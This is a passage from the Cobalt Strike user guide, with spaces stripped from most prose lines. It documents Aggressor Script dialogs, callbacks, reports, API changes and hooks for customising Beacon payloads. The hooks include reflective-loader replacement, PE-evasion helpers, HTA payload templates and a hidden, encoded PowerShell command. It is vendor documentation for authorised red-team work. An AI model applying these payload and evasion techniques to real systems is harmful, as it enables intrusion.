events.Theseeventsareheartbeat_X,whereXis1s,5s,10s,15s,30s,1m,5m,10m,15m,20m,
|
||
30m,or60m.
|
||
on heartbeat_10s {
|
||
println("I happen every 10 seconds");
|
||
}
|
||
Dialogs
|
||
AggressorScriptprovidesseveralfunctionstopresentandrequestinformationfromtheuser.
|
||
Use&show_messagetoprompttheuserwithamessage.Use&show_errortoprompttheuser
|
||
withanerror.
|
||
bind Ctrl+M {
|
||
show_message("I am a message!");
|
||
}
|
||
Use&prompt_texttocreateadialogthataskstheuserfortextinput.
|
||
prompt_text("What is your name?", "Joe Smith", {
|
||
show_message("Please $1 $+ , pleased to meet you");
|
||
});
|
||
The&prompt_confirmfunctionissimilarto&prompt_text,butinsteaditasksayes/noquestion.
|
||
Custom Dialogs
|
||
AggressorScripthasanAPItobuildcustomdialogs.&dialogcreatesadialog.Adialogconsists
|
||
ofrowsandbuttons.Arowisalabel,arowname,aGUIcomponenttotakeinput,andpossiblya
|
||
helpertosettheinput.Buttonsclosethedialogandtriggeracallbackfunction.Theargumentto
|
||
CobaltStrikeUserGuide www.fortra.com page:211
|
||
|
||
AggressorScript/OtherTopics
|
||
thecallbackfunctionisadictionarymappingeachrow'snametothevalueinitsGUI
|
||
componentthattakesinput.Use&dialog_showtoshowadialog,onceit'sbuilt.
|
||
Here'sadialogthatlookslikeSite Management -> Host FilefromCobaltStrike:
|
||
sub callback {
|
||
println("Dialog was actioned. Button: $2 Values: $3");
|
||
}
|
||
$dialog = dialog("Host File", %(uri => "/download/file.ext", port => 80,
|
||
mimetype => "automatic"), &callback);
|
||
dialog_description($dialog, "Host a file through Cobalt Strike's web server");
|
||
drow_file($dialog, "file", "File:");
|
||
drow_text($dialog, "uri", "Local URI:");
|
||
drow_text($dialog, "host", "Local Host:", 20);
|
||
drow_text($dialog, "port", "Local Port:");
|
||
drow_combobox($dialog, "mimetype", "Mime Type:", @("automatic",
|
||
"application/octet-stream",
|
||
"text/html", "text/plain"));
|
||
dbutton_action($dialog, "Launch");
|
||
dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file");
|
||
dialog_show($dialog);
|
||
Let'swalkthroughthisexample:The&dialogcallcreatestheHost Filedialog.Thesecond
|
||
parameterto&dialogisadictionarythatsetsdefaultvaluesfortheuri,port,andmimetype
|
||
rows.Thethirdparameterisareferencetoacallbackfunction.AggressorScriptwillcallthis
|
||
functionwhentheuserclickstheLaunchbutton.&dialog_descriptionplacesadescriptionatthe
|
||
topofthedialog.Thisdialoghasfiverows.Thefirstrow,madeby&drow_file,hasthelabel"File:",
|
||
thename"file",andittakesinputasatextfield.Thereisahelperbuttontochooseafileand
|
||
populatethetextfield.Theothersrowsareconceptuallysimilar.&dbutton_actionand
|
||
&dbutton_helpcreatebuttonsthatarecenteredatthebottomofthedialog.&dialog_show
|
||
showsthedialog.
|
||
Here'sthedialog:
|
||
CobaltStrikeUserGuide www.fortra.com page:212
|
||
|
||
AggressorScript/Callbacks
|
||
figure75-Ascripteddialog.
|
||
Callbacks
|
||
Acallbackisusedtoallowtheusertogetaccesstotheresultanddoadditionalprocessingon
|
||
theinformation.CobaltStrikeandAggressorScriptusestheconceptofcallbacksbecauseof
|
||
theasynchronousbehaviorofsendingatasktobeaconandtheresponsebeingreceived
|
||
sometimeinthefuturebasedonthecurrentsleeptime.Theyarealsousedwhendealingwith
|
||
customdialogsinordertoperformadditionalactionsbasedoninformationfromthedialog
|
||
inputandactionbutton.
|
||
Onceyourasynchronouscallbackisexecutedyoucanthenperformthenecessaryoperations
|
||
toprocesstheresultforyourusecase.Herearesomeexamplesofwhatyoucandowiththe
|
||
result:
|
||
l FormattheresultbeforedisplayingintheBeaconConsole
|
||
l Scantheresultforinformationtotriggersomeadditionaltask
|
||
l Savetheinformationtoafile
|
||
Acallbackfunctionwillhaveargumentsandinmostcaseswillhavethesamearguments,
|
||
howevertherearesomeexceptions.Youshouldalwaysrefertotheaggressorscriptfunction
|
||
documentationtounderstandwhatargumentsarebeingpassedtoyourcallback.
|
||
Callback Request and Response Processing
|
||
Thefollowingdescribesatahighlevelwhatgoesonwhenacallbackisusedinanaggressor
|
||
scriptcommand.
|
||
CobaltStrikeUserGuide www.fortra.com page:213
|
||
|
||
AggressorScript/Callbacks
|
||
l Theclientexecutesanaggressorscriptcommandwithacallback
|
||
o Arequestiscreatedandsavedinaqueuetoberetrievedlater
|
||
o Therequestissenttotheteamserver
|
||
l Theteamserverreceivestherequest
|
||
o Therequestissavedinaqueuetoberetrievedlater
|
||
o Therequestissenttoabeacon
|
||
l TheBeaconreceivestherequestandprocessesthetask
|
||
o Aresponseisgeneratedandsenttotheteamserver
|
||
l Theteamserverreceivestheresponse
|
||
o Therequestisretrievedfrom theteamserverqueueusinganidfrom theresponse
|
||
o Areplyisgeneratedandsenttotheoriginatingclient
|
||
l Theoriginatingclientreceivestheresponse
|
||
o Therequestisretrievedfrom theclientqueueusinganidfrom theresponse
|
||
o Theclientwillexecutethecallback
|
||
Boththeclientandteamserversaverequeststhathaveassociatedcallbacksinaqueue.A
|
||
requestiseventuallyremovedinordertomaintainthenumberofrequestinthequeue.A
|
||
requestisremovedwhenthesetwoconditionsoccur.
|
||
Thefirstconditioniswhentheoriginatingclientdisconnectsfromtheteamserver.Whenthis
|
||
happensthequeuemanagedbytheclientisremovedasthequeueisperteamserver
|
||
connection.Thequeueontheteamserverwillseetheoriginatingclienthasdisconnectedand
|
||
flaganyrequestsforthatclienttoberemoved.Thismeanstheoriginatingclientneedstostay
|
||
connectedtotheteamserveruntilthecommandwithacallbackhascompleted.Otherwise,any
|
||
responsesfromBeaconafteradisconnectionfromtheoriginatingclientwillbelost.
|
||
Thesecondconditioniswhenthereisnoresponsesforarequestafteraperiodoftime.There
|
||
aretwotimeoutsettingsthatdetermineifarequestshouldberemoved.Thefirstsettingisthe
|
||
limits.callback_max_timeoutwhichdefaultsto1day,whichisusedtowaitfortheinitial
|
||
response.Thesecondsettingisthelimits.callback_keep_timeoutwhichdefaultsto1hour,
|
||
whichisusedtowaitforsubsequentresponses.Thesesettingscanbemodifiedbyupdating
|
||
theTeamServer.propfile.Inmostusecasesthedefaultsshouldbefine,howeverifyoucreatea
|
||
commandthatisalong-runningjob/taskthenthesesettingsmayneedtobeadjusted.The
|
||
adjustedsettingsneedtobebasedonhowoftendatawillbereceived,whichneedstoaccount
|
||
forbeacon'ssleeptimeandhowoftenthejob/tasksendsdata.
|
||
Ifyouseeerror(s)likethefollowingintheteamserverconsolewindowthenthiscanindicatethe
|
||
settingsneedtobeadjustedortheoriginatingclienthasdisconnectedfromtheteamserver.
|
||
`"Callback #/# has no pending request"`
|
||
CobaltStrikeUserGuide www.fortra.com page:214
|
||
|
||
AggressorScript/Callbacks
|
||
TheTeamServer.propfileisnotincludedintheCobaltStrikedistribution.Thecurrentdefault
|
||
filecanbefoundonGithub(https://github.com/Cobalt-Strike/teamserver-prop).
|
||
Callback Implementation
|
||
Aggressorscriptcallbackscanbeimplementedusingafewdifferenttechniquesandinmany
|
||
casesthetechniqueusedisbasedonpersonalpreference.Therearesomeusecaseswhere
|
||
youwillwanttochooseaparticulartechniqueinordertoaccomplishthetask.Thefollowing
|
||
typeoftechniquescanbeusedfollowedbysimplesnippetsofcode:
|
||
l AnonymousClosure
|
||
l NamedClosure
|
||
l LambdaClosure
|
||
Examplesofaggressorscriptfunctionsthatsupporttheuseofacallbackfunctioncanbefound
|
||
onGithub(https://github.com/Cobalt-Strike/callback_examples).
|
||
AnonymousClosureExample
|
||
Ananonymousclosureisusefulwhenyouhaveasmallamountofcodethatcanbekeptinline
|
||
withthecaller.Inthisexampletheclosureisexecutedinthefuturewhendataisreturnedfroma
|
||
BOF,whichsimplylogstheoutputtothebeaconconsole.
|
||
alias cs_example {
|
||
# User setup code removed for brevity
|
||
beacon_inline_execute($bid, $data, "go", $args, { blog($1, $2); });
|
||
}
|
||
Named ClosureExample
|
||
Anamedclosureisusefulwhenyouhavealotofcodeandmaywanttoreusethecodewith
|
||
otheraggressorfunctions.Inthisexampletheclosurenamed`bof_cb`isexecutedinthefuture
|
||
whendataisreturnedfromaBOF.
|
||
# $1 - bid, $2 - result, $3 - info map
|
||
sub bof_cb {
|
||
# User defined code removed for brevity
|
||
}
|
||
alias cs_example {
|
||
local('$bid $data $args');
|
||
# User setup code removed for brevity
|
||
beacon_inline_execute($bid, $data, "go", $args, &bof_cb));
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:215
|
||
|
||
AggressorScript/CustomReports
|
||
Lambda ClosureExample
|
||
Alambdaclosureisusefulwhenyouwanttopassvariable(s)thatwouldnotbeinscopeusing
|
||
thepreviousmethods.Thisexampleshowshowyoucangetaccesstothe$test_numvariable
|
||
whichisinthescopeofthecs_examplealias.
|
||
# $1 - bid, $2 - result, $3 - info map, $4 - test_num
|
||
sub bof_cb {
|
||
# User defined code removed for brevity
|
||
}
|
||
alias cs_example {
|
||
local('$bid $file $test_num');
|
||
# User setup code removed for brevity
|
||
binline_execute($bid, $file, $test_num, lambda({ bof_cb
|
||
($1, $2, $3, $test_num); }, \$test_num);
|
||
}
|
||
Custom Reports
|
||
CobaltStrikeusesadomain-specificlanguagetodefineitsreports.Thislanguageissimilarto
|
||
AggressorScriptbutdoesnothaveaccesstomostofitsAPIs.Thereportgenerationprocess
|
||
happensinitsownscriptengineisolatedfromyourclient.
|
||
ThereportscriptenginehasaccesstoadataaggregationAPIandafewprimitivestospecify
|
||
thestructureofaCobaltStrikereport.
|
||
Thedefault.rptfiledefinesthedefaultreportsinCobaltStrike.
|
||
Loading Reports
|
||
GotoCobalt Strike->Preferences->Reportstoloadacustomreport.PresstheFoldericon
|
||
andselecta.rptfile.PressSave.YoushouldnowseeyourcustomreportundertheReporting
|
||
menuinCobaltStrike.
|
||
CobaltStrikeUserGuide www.fortra.com page:216
|
||
|
||
AggressorScript/CustomReports
|
||
figure76-Loadareportfilehere.
|
||
Report Errors
|
||
IfCobaltStrikehadtroublewithyourreport(e.g.,asyntaxerror,runtimeerror,etc.)thiswillshow
|
||
upinthescriptconsole.GotoView->Script Consoletoseethesemessages.
|
||
"Hello World"Report
|
||
Here'sasimple"HelloWorld"report.Thisreportdoesn'trepresentanythingspecial.Itmerely
|
||
showshowtogetstartedwithacustomreport.
|
||
# default description of our report [the user can change this].
|
||
describe("Hello Report", "This is a test report.");
|
||
# define the Hello Report
|
||
report "Hello Report" {
|
||
# the first page is the cover page of our report.
|
||
page "first" {
|
||
# title heading
|
||
h1($1['long']);
|
||
# today's date/time in an italicized format
|
||
ts();
|
||
# a paragraph [could be the default...
|
||
p($1['description']);
|
||
}
|
||
# this is the rest of the report
|
||
CobaltStrikeUserGuide www.fortra.com page:217
|
||
|
||
AggressorScript/CompatibilityGuide
|
||
page "rest" {
|
||
# hello world paragraph
|
||
p("Hello World!");
|
||
}
|
||
}
|
||
AggressorScriptdefinesnewreportswiththereportkeywordfollowedbyareportnameanda
|
||
blockofcode.Usethepagekeywordwithinareportblocktodefinewhichpagetemplatetouse.
|
||
Contentforapagetemplatemayspanmultiplepages.Thefirstpagetemplateisthecoverof
|
||
CobaltStrike'sreports.Thisexampleuses&h1toprintatitleheading.The&tsfunctionprintsa
|
||
date/timestampforthereport.Andthe&pfunctionprintsaparagraph.
|
||
The&describefunctionsetsadefaultdescriptionofthereport.Theusermayeditthiswhenthey
|
||
generatethereport.Thisinformationispassedtothereportaspartofthereportmetadatain
|
||
the$1parameter.The$1parameterisadictionarywithinformationabouttheuser's
|
||
preferencesforthereport.
|
||
Data Aggregation API
|
||
CobaltStrikeReportsdependontheDataAggregationAPItosourcetheirinformation.ThisAPI
|
||
providesyouamergedviewofdatafromallteamserver'syourclientiscurrentlyconnectedto.
|
||
TheDataAggregationAPIallowsreportstoprovideacomprehensivereportoftheassessment
|
||
activities.Thesefunctionsbeginwiththeagprefix(e.g.,&agTargets).Thereportenginepasses
|
||
adataaggregatemodelwhenitgeneratesareport.Thismodelisthe$3parameter.
|
||
Compatibility Guide
|
||
ThispagedocumentsCobaltStrikechangesversion-to-versionthatmayaffectcompatability
|
||
withyourcurrentAggressorScripts.Ingeneral,it'sourgoalthatascriptwrittenforCobaltStrike
|
||
3.0isforward-compatiblewithfuture3.xreleases.Majorproductreleases(e.g.,3.0->4.0)do
|
||
giveussomelicensetorevisitAPIsandbreaksomeofthiscompatability.Sometimes,a
|
||
compatabilitybreakingAPIchangeisinevitable.Thesechangesaredocumentedhere.
|
||
Cobalt Strike 4.x
|
||
1. CobaltStrike4.xmademajorchangestoCobaltStrike'slistenermanagementsystems.
|
||
Thesechangesincludednamechangesforseveralpayloads.Scriptsthatanalyzethe
|
||
listenerpayloadnameshouldnotethesechanges:
|
||
l windows/beacon_smb/bind_pipeisnowwindows/beacon_bind_pipe
|
||
l windows/beacon_tcp/bind_tcpisnowwindows/beacon_bind_tcp
|
||
CobaltStrikeUserGuide www.fortra.com page:218
|
||
|
||
AggressorScript/CompatibilityGuide
|
||
2. CobaltStrike4.xmovesawayfrom payloadstagers.Stagelesspayloadsarepreferredin
|
||
allpost-exworkflows.Wherestagelessisn'tpossible;useanexplicitstagerthatworks
|
||
withallpayloads.
|
||
Thejump psexec_pshlateralmovementattackisagoodexampleoftheabove.This
|
||
automationgeneratesabind_pipestagertofitwithinthesizeconstraintsofa
|
||
PowerShellone-liner.Allpayloadsaresentthroughthisstagingprocess;regardlessof
|
||
theirconfiguration.
|
||
Thisconventionchangewillbreaksomeprivilegeescalationscriptsthatfollowthepre-
|
||
4.xpatternsintheElevateKit.&bstageisnowgoneasitsunderlyingfunctionalitywas
|
||
changedtoomuchtoincludeinCobaltStrike4.x.Wherepossible,privilegeescalation
|
||
scriptsshoulduse&payloadtoexportapayload,runitviathetechnique,anduse
|
||
&beacon_linktoconnecttothepayload.Ifastagerisrequired;use&stager_bind_tcpto
|
||
exportaTCPstagerand&beacon_stage_tcptostageapayloadthroughthisstager.
|
||
3. CobaltStrike4.xremovesthefollowingAggressorScriptfunctions:
|
||
Function Replacement Reason
|
||
&bbypassuac &belevate &belevateisthepreferredfunctiontospawnan
|
||
elevatedsessiononthelocalsystem
|
||
&bpsexec_psh &bjump &bjumpisthepreferredfunctiontospawna
|
||
sessiononaremotetarget
|
||
&brunasadmin &belevate_ runasadminwasexpandedtoallowmultiple
|
||
command optionstorunacommandinanelevated
|
||
context
|
||
&bstage multiple &bstagewouldstageANDlinkwhenneeded.
|
||
functions Bindstagingisnowexplicitwith&beacon_
|
||
stage_tcpor&beacon_stage_pipe.&beacon_
|
||
linkisthegeneral"linktothislistener"step.
|
||
&bwdigest &bmimikatz Use&bmimikatztorunthiscommand...ifyou
|
||
reallywantto.:)
|
||
&bwinrm &bjump,winrm &bjumpisthepreferredfunctiontospawna
|
||
orwinrm64 sessiononaremotetarget
|
||
&bwmi NostagelessWMIlateralmovementoption
|
||
existsinCS4.x
|
||
4. CobaltStrike4.xdeprecatesthefollowingAggressorScriptfunctions:
|
||
CobaltStrikeUserGuide www.fortra.com page:219
|
||
|
||
AggressorScript/Hooks
|
||
Function Replacement Reason
|
||
&artifact &artifact_stager Consistentarguments;consistentnaming
|
||
convetion
|
||
&artifact_ &artifact_ Consistentnaming;noneedforacallbackin
|
||
stageless payload CobaltStrike4.x
|
||
&drow_ Proxyconfigisnowtiedtothelistenerandnot
|
||
proxyserver neededwhenexportingapayloadstage.
|
||
&drow_listener_ &drow_listener_ Thesefunctionsarenowequivalentto
|
||
smb stage eachother
|
||
&listener_create &listener_create_ Alotmoreoptionsrequiredachangeinhow
|
||
ext argumentsarepassed
|
||
&powershell &powershell_ Consistency;de-emphasisonPowerShellone-
|
||
command, linersinAPI
|
||
&artifact_stager
|
||
&powershell_ &powershell_ Clearernaming.
|
||
encode_oneliner command
|
||
&powershell_ &powershell_ Consistency;clearerseparationofpartsinAPI
|
||
encode_stager command,
|
||
&artifact_general
|
||
&shellcode &stager Consistentarguments;consistentnaming
|
||
Hooks
|
||
HooksallowAggressorScripttointerceptandchangeCobaltStrikebehavior.
|
||
APPLET_SHELLCODE_FORMAT
|
||
Formatshellcodebeforeit'splacedontheHTMLpagegeneratedtoservetheSignedorSmart
|
||
AppletAttacks.SeeUser-driven Web Drive-by Attacks on page 79.
|
||
AppletKit
|
||
ThishookisdemonstratedintheAppletKit.TheAppletKitisavailableviatheCobaltStrike
|
||
Arsenal(Help->Arsenal).
|
||
CobaltStrikeUserGuide www.fortra.com page:220
|
||
|
||
AggressorScript/Hooks
|
||
Example
|
||
set APPLET_SHELLCODE_FORMAT {
|
||
return base64_encode($1);
|
||
}
|
||
BEACON_RDLL_GENERATE
|
||
HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderinabeaconwithaUserDefined
|
||
ReflectiveLoader.Thereflectiveloadercanbeextractedfromacompiledobjectfileand
|
||
pluggedintotheBeaconPayloadDLL.SeeUser Defined Reflective DLL Loader on page 164.
|
||
Arguments
|
||
$1-Beaconpayloadfilename
|
||
$2-Beaconpayload(dllbinary)
|
||
$3-Beaconarchitecture(x86/x64)
|
||
Returns
|
||
TheBeaconexecutablepayloadupdatedwiththeUserDefinedreflectiveloader.Return$nullto
|
||
usethedefaultBeaconexecutablepayload.
|
||
Example
|
||
sub generate_my_dll {
|
||
local('$handle $data $loader $temp_dll');
|
||
# ---------------------------------------------------------------------
|
||
# Load an Object File that contains a Reflective Loader.
|
||
# The architecture ($3) is used in the path.
|
||
# ---------------------------------------------------------------------
|
||
# $handle = openf("/mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+
|
||
.o");
|
||
$handle = openf("mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
# warn("Object File Length: " . strlen($data));
|
||
CobaltStrikeUserGuide www.fortra.com page:221
|
||
|
||
AggressorScript/Hooks
|
||
if (strlen($data) eq 0) {
|
||
warn("Error loading reflective loader object file.");
|
||
return $null;
|
||
}
|
||
# ---------------------------------------------------------------------
|
||
# extract loader from BOF.
|
||
# ---------------------------------------------------------------------
|
||
$loader = extract_reflective_loader($data);
|
||
# warn("Reflective Loader Length: " . strlen($loader));
|
||
if (strlen($loader) eq 0) {
|
||
warn("Error extracting reflective loader.");
|
||
return $null;
|
||
}
|
||
# ---------------------------------------------------------------------
|
||
# Replace the beacons default reflective loader with '$loader'.
|
||
# ---------------------------------------------------------------------
|
||
$temp_dll = setup_reflective_loader($2, $loader);
|
||
# ---------------------------------------------------------------------
|
||
# TODO: Additional Customization of the PE...
|
||
# - Use 'pedump' function to get information for the updated DLL.
|
||
# - Use these convenience functions to perform transformations on the DLL:
|
||
# pe_remove_rich_header
|
||
# pe_insert_rich_header
|
||
# pe_set_compile_time_with_long
|
||
# pe_set_compile_time_with_string
|
||
# pe_set_export_name
|
||
# pe_update_checksum
|
||
# - Use these basic functions to perform transformations on the DLL:
|
||
# pe_mask
|
||
# pe_mask_section
|
||
# pe_mask_string
|
||
# pe_patch_code
|
||
# pe_set_string
|
||
# pe_set_stringz
|
||
# pe_set_long
|
||
# pe_set_short
|
||
# pe_set_value_at
|
||
# pe_stomp
|
||
# ---------------------------------------------------------------------
|
||
# ---------------------------------------------------------------------
|
||
# Give back the updated beacon DLL.
|
||
# ---------------------------------------------------------------------
|
||
CobaltStrikeUserGuide www.fortra.com page:222
|
||
|
||
AggressorScript/Hooks
|
||
return $temp_dll;
|
||
}
|
||
# ------------------------------------
|
||
# $1 = DLL file name
|
||
# $2 = DLL content
|
||
# $3 = arch
|
||
# ------------------------------------
|
||
set BEACON_RDLL_GENERATE {
|
||
warn("Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture "
|
||
. $3);
|
||
return generate_my_dll($1, $2, $3);
|
||
}
|
||
BEACON_RDLL_GENERATE_LOCAL
|
||
TheBEACON_RDLL_GENERATE_LOCALhookisverysimilartoBEACON_RDLL_GENERATEwith
|
||
additionalarguments.
|
||
Arguments
|
||
$1-Beaconpayloadfilename
|
||
$2-Beaconpayload(dllbinary)
|
||
$3-Beaconarchitecture(x86/x64)
|
||
$4-ParentbeaconID
|
||
$5-GetModuleHandleApointer
|
||
$6-GetProcAddresspointer
|
||
Example
|
||
# ------------------------------------
|
||
# $1 = DLL file name
|
||
# $2 = DLL content
|
||
# $3 = arch
|
||
# $4 = parent Beacon ID
|
||
# $5 = GetModuleHandleA pointer
|
||
# $6 = GetProcAddress pointer
|
||
# ------------------------------------
|
||
set BEACON_RDLL_GENERATE_LOCAL {
|
||
warn("Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " .
|
||
CobaltStrikeUserGuide www.fortra.com page:223
|
||
|
||
AggressorScript/Hooks
|
||
$1 ." with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA "
|
||
$5 . " GetProcAddress " . $6);
|
||
return generate_my_dll($1, $2, $3);
|
||
}
|
||
AlsoSee
|
||
BEACON_RDLL_GENERATE on page 221
|
||
BEACON_RDLL_SIZE
|
||
TheBEACON_RDLL_SIZEhookallowstheuseofbeaconswithmorespacereservedforUser
|
||
DefinedReflectiveloaders.ThealternatebeaconsareusedintheBEACON_RDLL_GENERATE
|
||
andBEACON_RDLL_GENERATE_LOCALhooks.Theoriginal/defaultspacereservedfor
|
||
reflectiveloadersis5KB.Thehookalsoallowstheentirereflectiveloaderspacetoberemoved.
|
||
Overridingthissettingwillgeneratebeaconsthataretoolargefortheplaceholdersinstandard
|
||
artifacts.Itisverylikelytorequirecustomizedchangesinanartifactkittoexpandreserved
|
||
payloadspace.SeethedocumentationintheartifactkitprovidedbyCobaltStrike.
|
||
Customized"stagesize"settingsaredocumentedin"build.sh"and"script.example".SeeUser
|
||
Defined Reflective DLL Loader on page 164.
|
||
Arguments
|
||
$1-Beaconpayloadfilename
|
||
$2-Beaconarchitecture(x86/x64)
|
||
Returns
|
||
ThesizeinKBfortheReflectiveLoaderreservedspaceinbeacons.Validvaluesare"0","5","100".
|
||
"0"usesbeaconswithoutthereservedspacesforreflectiveloaders.
|
||
"5"isthedefaultandusesstandardbeaconswith5KBreservedspaceforreflectiveloaders.
|
||
"100"useslargerbeaconswith100KBreservedspaceforreflectiveloaders.
|
||
Example
|
||
# ------------------------------------
|
||
# $1 = DLL file name
|
||
CobaltStrikeUserGuide www.fortra.com page:224
|
||
|
||
AggressorScript/Hooks
|
||
# $2 = arch
|
||
# ------------------------------------
|
||
set BEACON_RDLL_SIZE {
|
||
warn("Running 'BEACON_RDLL_SIZE' for DLL " . $1 . " with architecture " .
|
||
$2);
|
||
return "100";
|
||
}
|
||
BEACON_SLEEP_MASK
|
||
UpdateaBeaconpayloadwithaUserDefinedSleepMask
|
||
Arguments
|
||
$1-beacontype(default,pivot)
|
||
$2-arch
|
||
SleepMaskKit
|
||
ThishookisdemonstratedintheThe Sleep Mask Kit on page 92.
|
||
EXECUTABLE_ARTIFACT_GENERATOR
|
||
ControltheEXEandDLLgenerationforCobaltStrike.
|
||
Arguments
|
||
$1-theartifactfile(e.g.,artifact32.exe)
|
||
$2-shellcodetoembedintoanEXEorDLL
|
||
ArtifactKit
|
||
ThishookisdemonstratedintheThe Artifact Kit on page 89.
|
||
HTMLAPP_EXE
|
||
ControlsthecontentoftheHTMLApplicationUser-driven(EXEOutput)generatedbyCobalt
|
||
Strike.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:225
|
||
|
||
AggressorScript/Hooks
|
||
$1-theEXEdata
|
||
$2-thenameofthe.exe
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
||
set HTMLAPP_EXE {
|
||
local('$handle $data');
|
||
$handle = openf(script_resource("template.exe.hta"));
|
||
$data = readb($handle, -1);
|
||
osef($handle);
|
||
$data = strrep($data, '##EXE##', transform($1, "hex"));
|
||
$data = strrep($data, '##NAME##', $2);
|
||
return $data;
|
||
}
|
||
HTMLAPP_POWERSHELL
|
||
ControlsthecontentoftheHTMLApplicationUser-driven(PowerShellOutput)generatedby
|
||
CobaltStrike.
|
||
Arguments
|
||
$1-thePowerShellcommandtorun
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
||
set HTMLAPP_POWERSHELL {
|
||
local('$handle $data');
|
||
$handle = openf(script_resource("template.psh.hta"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
CobaltStrikeUserGuide www.fortra.com page:226
|
||
|
||
AggressorScript/Hooks
|
||
# push our command into the script
|
||
return strrep($data, "%%DATA%%", $1);
|
||
}
|
||
LISTENER_MAX_RETRY_STRATEGIES
|
||
Returnastringthatcontainsthelistofdefinitionswhichisseparatedwitha'\n'character.The
|
||
definitionneedstomatchasyntaxofexit-[max_attempts]-[increase_attempts]-
|
||
[duration][m,h,d].
|
||
Forexampleexit-10-5-5mwillexitbeaconafter10failedattemptsandwillincreasesleep
|
||
timeafterfivefailedattemptsto5minutes.Thesleeptimewillnotbeupdatedifthecurrent
|
||
sleeptimeisgreaterthanthespecifieddurationvalue.Thesleeptimewillbeaffectedbythe
|
||
currentjittervalue.Onasuccessfulconnectionthefailedattemptscountwillberesettozero
|
||
andthesleeptimewillberesettothepriorvalue.
|
||
Return$nulltousethedefaultlist.
|
||
Example
|
||
# Use a hard coded list of strategies
|
||
set LISTENER_MAX_RETRY_STRATEGIES {
|
||
local('$out');
|
||
$out .= "exit-50-25-5m\n";
|
||
$out .= "exit-100-25-5m\n";
|
||
$out .= "exit-50-25-15m\n";
|
||
$out .= "exit-100-25-15m\n";
|
||
return $out;
|
||
}
|
||
# Use loops to build a list of strategies
|
||
set LISTENER_MAX_RETRY_STRATEGIES {
|
||
local('$out');
|
||
@attempts = @(50, 100);
|
||
@durations = @("5m", "15m");
|
||
$increase = 25;
|
||
foreach $attempt (@attempts)
|
||
{
|
||
foreach $duration (@durations)
|
||
CobaltStrikeUserGuide www.fortra.com page:227
|
||
|
||
AggressorScript/Hooks
|
||
{
|
||
$out .= "exit $+ - $+ $attempt $+ - $+ $increase $+ - $+ $duration\n";
|
||
}
|
||
}
|
||
return $out;
|
||
}
|
||
POSTEX_RDLL_GENERATE
|
||
HooktoallowuserstoreplacetheCobaltStrikereflectiveloaderforpost-exwithaUserDefined
|
||
ReflectiveLoader.SeePost-ex User Defined Reflective DLL Loader on page 163.
|
||
ThePost-exDLLpassedasargument2doesnotcontainanyreflectiveloader.Youdonotneed
|
||
toremoveanexistingreflectiveloaderfromtheDLL.
|
||
Arguments
|
||
$1–Post-expayloadfilename
|
||
$2–Post-expayload(dllbinary)
|
||
$3–Post-exarchitecture(x86/x64)
|
||
$4–parentBeaconID
|
||
$5–GetModuleHandlepointer
|
||
$6–GetProcAddresspointer
|
||
Returns
|
||
ThePost-expayloadupdatedwiththeUserDefinedreflectiveloader.Return$nulltousethe
|
||
defaultPost-expayloadandloader.
|
||
Example
|
||
# ------------------------------------
|
||
# $1 = DLL file name
|
||
# $2 = DLL content
|
||
# $3 = arch
|
||
# $4 = parent Beacon ID
|
||
# $5 = GetModuleHandle pointer
|
||
CobaltStrikeUserGuide www.fortra.com page:228
|
||
|
||
AggressorScript/Hooks
|
||
# $6 = GetProcAddress pointer
|
||
# ------------------------------------
|
||
set POSTEX_RDLL_GENERATE {
|
||
local('$arch $ postex $file_handle $ldr $loader_path $payload');
|
||
$postex = $2;
|
||
$arch = $3;
|
||
warn("Running 'POSTEX_RDLL_GENERATE' for DLL " .
|
||
$1 ." with architecture " . $3 . " Beacon ID " . $4 . " .
|
||
GetModuleHandleA “ .
|
||
$5 . " GetProcAddress " . $6);
|
||
# Read the UDRL from the supplied binary file
|
||
$loader_path = "mystuff/Refloaders/bin/MyPostExReflectiveLoader. $+
|
||
$arch $+ .o";
|
||
$file_handle = openf($loader_path);
|
||
$ldr = readb($file_handle, -1);
|
||
closef($file_handle);
|
||
if (strlen($ldr) == 0) {
|
||
warn("Error: Failed to read $loader_path");
|
||
return $null;
|
||
}
|
||
# Prepend UDRL (sRDI/Double Pulsar type) to Post-ex DLL and output
|
||
the modified payload.
|
||
$payload = $ldr . $postex;
|
||
print_info("Payload Size: " . strlen($payload));
|
||
return $payload;
|
||
}
|
||
POWERSHELL_COMMAND
|
||
ChangetheformofthepowershellcomamndrunbyCobaltStrike'sautomation.Thisaffects
|
||
jumppsexec_psh,powershell,and[host]->Access->One-liner.
|
||
Arguments
|
||
$1-thePowerShellcommandtorun.
|
||
$2-true|falsethecommandisrunonaremotetarget.
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:229
|
||
|
||
AggressorScript/Hooks
|
||
set POWERSHELL_COMMAND {
|
||
local('$script');
|
||
$script = transform($1, "powershell-base64");
|
||
# remote command (e.g., jump psexec_psh)
|
||
if ($2) {
|
||
return "powershell -nop -w hidden -encodedcommand $script";
|
||
}
|
||
# local command
|
||
else {
|
||
return "powershell -nop -exec bypass -EncodedCommand $script";
|
||
}
|
||
}
|
||
POWERSHELL_COMPRESS
|
||
AhookusedbytheresourcekittocompressaPowerShellscript.Thedefaultusesgzipand
|
||
returnsadeflatorscript.
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Arguments
|
||
$1-thescripttocompress
|
||
POWERSHELL_DOWNLOAD_CRADLE
|
||
ChangetheformofthePowerShelldownloadcradleusedinCobaltStrike'spost-exautomation.
|
||
Thisincludesjumpwinrm|winrm64,[host]->Access->OneLiner,andpowershell-import.
|
||
Arguments
|
||
$1-theURLofthe(localhost)resourcetoreach
|
||
ResourceKit
|
||
ThishookisdemonstratedintheThe Resource Kit on page 92.
|
||
Example
|
